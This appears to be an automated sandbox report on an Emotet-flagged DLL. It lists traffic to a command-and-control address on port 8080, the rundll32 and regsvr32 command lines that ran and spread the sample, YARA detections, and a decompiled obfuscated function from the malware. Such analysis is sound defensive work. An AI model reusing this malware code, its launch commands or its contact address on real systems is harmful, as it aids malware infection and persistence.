Jan 14, 2022 19:07:41.167819977 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:41.167952061 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:41.180310011 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:41.307081938 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:41.319912910 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:41.319952965 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:41.319988012 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:41.320017099 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:44.705113888 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:44.831696033 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:44.832277060 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:44.832464933 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:44.836919069 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:44.963500023 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:45.474575996 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:45.474756956 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:48.471724987 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:48.471784115 CET	8080	49771	69.16.218.101	192.168.2.4
Jan 14, 2022 19:07:48.471878052 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:07:48.471931934 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:09:28.631973028 CET	49771	8080	192.168.2.4	69.16.218.101
Jan 14, 2022 19:09:28.632010937 CET	49771	8080	192.168.2.4	69.16.218.101

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6532 Parent PID: 5356

General

Start time:	19:07:04
Start date:	14/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll"
Imagebase:	0x1350000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.677964446.0000000000820000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.676011964.0000000000820000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.678063941.0000000000861000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000002.702950192.0000000000820000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000000.00000000.676117547.0000000000861000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6540 Parent PID: 6532

General

Start time:	19:07:04
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6536 Parent PID: 6532

General

Start time:	19:07:05
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\hPJnda9rBy.dll
Imagebase:	0xe80000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.669073242.0000000000E40000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.669249846.0000000002F11000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6620 Parent PID: 6540

General

Start time:	19:07:05
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",#1
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.669823060.0000000004480000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.669847564.00000000044B1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6616 Parent PID: 6532

General

Start time:	19:07:05
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\hPJnda9rBy.dll,DllRegisterServer
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719107308.0000000004941000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719259656.0000000004B51000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719178137.0000000004A71000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719295807.0000000004B80000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719142845.0000000004A40000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719325918.0000000004BB1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719229913.0000000004B20000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.718771472.00000000042E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.719080684.0000000004910000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.718927690.0000000004431000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6580 Parent PID: 6536

General

Start time:	19:07:06
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6640 Parent PID: 6620

General

Start time:	19:07:06
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\hPJnda9rBy.dll",DllRegisterServer
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685263921.0000000005281000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.684322708.00000000031C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.684701271.0000000004AC1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685292012.00000000052B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685429920.0000000005641000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685397124.0000000005610000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685144979.0000000005121000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685224843.0000000005250000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685049749.0000000005001000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685326019.00000000052E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.684986586.0000000004FB0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.685112085.00000000050F0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6016 Parent PID: 568

General

Start time:	19:07:09
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 4180 Parent PID: 6016

General

Start time:	19:07:10
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 6532 -ip 6532
Imagebase:	0xfe0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5792 Parent PID: 6640

General

Start time:	19:07:12
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Knpnqswfpazuozi\koewoajrwakr.ckb",kzlZNp
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.688210118.00000000037E1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.687920491.0000000003520000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5588 Parent PID: 6532

General

Start time:	19:07:12
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 536
Imagebase:	0xfe0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5604 Parent PID: 5792

General

Start time:	19:07:14
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Knpnqswfpazuozi\koewoajrwakr.ckb",DllRegisterServer
Imagebase:	0x390000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7024 Parent PID: 568

General

Start time:	19:07:28
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5556 Parent PID: 568

General

Start time:	19:07:50
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4552 Parent PID: 568

General

Start time:	19:08:02
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6532 Parent PID: 5356 loaddll32.exeCOMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	55.8%
Total number of Nodes:	1073
Total number of Limit Nodes:	5

Executed Functions

Function 0087EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0087EFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E0087FE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E00861A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672);
						E00880DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E0087E1F8(0x861160, _v1680, __eflags);
						E00882D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x861160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E0087FECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E008785FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E0087E1F8(0x861120, _v1700, _t462);
						_t393 = E0088061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E0087FECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = E0086C307();
				_t445 = 0x6d37c50;
				goto L20;
			}

0x0087efdd
0x0087efe3
0x0087efed
0x0087eff5
0x0087effd
0x0087f005
0x0087f010
0x0087f01b
0x0087f026
0x0087f038
0x0087f03d
0x0087f043
0x0087f04b
0x0087f04d
0x0087f055
0x0087f05a
0x0087f06c
0x0087f071
0x0087f07a
0x0087f085
0x0087f08d
0x0087f092
0x0087f097
0x0087f09f
0x0087f0a7
0x0087f0af
0x0087f0b4
0x0087f0bc
0x0087f0c4
0x0087f0cc
0x0087f0d4
0x0087f0d9
0x0087f0e1
0x0087f0f3
0x0087f0f6
0x0087f0fd
0x0087f108
0x0087f113
0x0087f11b
0x0087f126
0x0087f133
0x0087f137
0x0087f144
0x0087f148
0x0087f150
0x0087f15b
0x0087f166
0x0087f171
0x0087f179
0x0087f181
0x0087f189
0x0087f191
0x0087f199
0x0087f1a6
0x0087f1aa
0x0087f1b2
0x0087f1bd
0x0087f1c8
0x0087f1d3
0x0087f1e6
0x0087f1ed
0x0087f1f8
0x0087f203
0x0087f210
0x0087f21b
0x0087f223
0x0087f231
0x0087f236
0x0087f23c
0x0087f244
0x0087f250
0x0087f255
0x0087f25b
0x0087f260
0x0087f268
0x0087f270
0x0087f278
0x0087f280
0x0087f288
0x0087f294
0x0087f299
0x0087f29f
0x0087f2a4
0x0087f2ac
0x0087f2b7
0x0087f2c2
0x0087f2cd
0x0087f2d5
0x0087f2da
0x0087f2e2
0x0087f2ea
0x0087f2f2
0x0087f2fe
0x0087f303
0x0087f309
0x0087f30e
0x0087f316
0x0087f31e
0x0087f32a
0x0087f32f
0x0087f335
0x0087f33d
0x0087f345
0x0087f34d
0x0087f355
0x0087f35d
0x0087f365
0x0087f36d
0x0087f378
0x0087f383
0x0087f38e
0x0087f396
0x0087f39b
0x0087f3a3
0x0087f3ab
0x0087f3bd
0x0087f3c0
0x0087f3c7
0x0087f3d2
0x0087f3da
0x0087f3df
0x0087f3e7
0x0087f3ef
0x0087f3f4
0x0087f3fc
0x0087f400
0x0087f408
0x0087f410
0x0087f41d
0x0087f421
0x0087f429
0x0087f431
0x0087f439
0x0087f441
0x0087f449
0x0087f451
0x0087f459
0x0087f461
0x0087f469
0x0087f476
0x0087f47a
0x0087f482
0x0087f48d
0x0087f498
0x0087f4a3
0x0087f4ab
0x0087f4b3
0x0087f4b8
0x0087f4c0
0x0087f4c8
0x0087f4d0
0x0087f4d8
0x0087f4e0
0x0087f4e8
0x0087f4f2
0x0087f4f6
0x0087f4fa
0x0087f502
0x0087f50a
0x0087f512
0x0087f51f
0x0087f523
0x0087f52b
0x0087f533
0x0087f53b
0x0087f540
0x0087f548
0x0087f55a
0x0087f72e
0x0087f734
0x0087f735
0x00000000
0x0087f735
0x0087f566
0x0087f6d1
0x0087f6d3
0x0087f6d7
0x0087f70c
0x0087f70c
0x00000000
0x00000000
0x00000000
0x00000000
0x0087f6d9
0x0087f6d9
0x0087f6d9
0x0087f6dd
0x00000000
0x00000000
0x0087f6df
0x0087f6f4
0x0087f6f4
0x0087f6f7
0x0087f6fa
0x0087f6fd
0x00000000
0x00000000
0x0087f6e8
0x0087f6ec
0x00000000
0x00000000
0x0087f6ee
0x0087f6f1
0x0087f6f1
0x0087f6f1
0x0087f6ff
0x0087f6ff
0x0087f701
0x0087f704
0x0087f704
0x0087f707
0x0087f707
0x00000000
0x0087f6d9
0x0087f572
0x0087f62f
0x0087f64e
0x0087f653
0x0087f65c
0x0087f663
0x0087f673
0x0087f6a2
0x0087f6ab
0x0087f6bf
0x0087f6c4
0x0087f6c7
0x00000000
0x0087f6c7
0x0087f57e
0x0087f760
0x0087f778
0x0087f782
0x0087f782
0x0087f786
0x0087f78f
0x0087f78f
0x0087f584
0x0087f58a
0x0087f590
0x0087f59c
0x0087f5a0
0x0087f5b4
0x0087f5cb
0x0087f5d9
0x0087f5ef
0x0087f5f7
0x0087f5fd
0x0087f602
0x0087f602
0x0087f752
0x0087f758
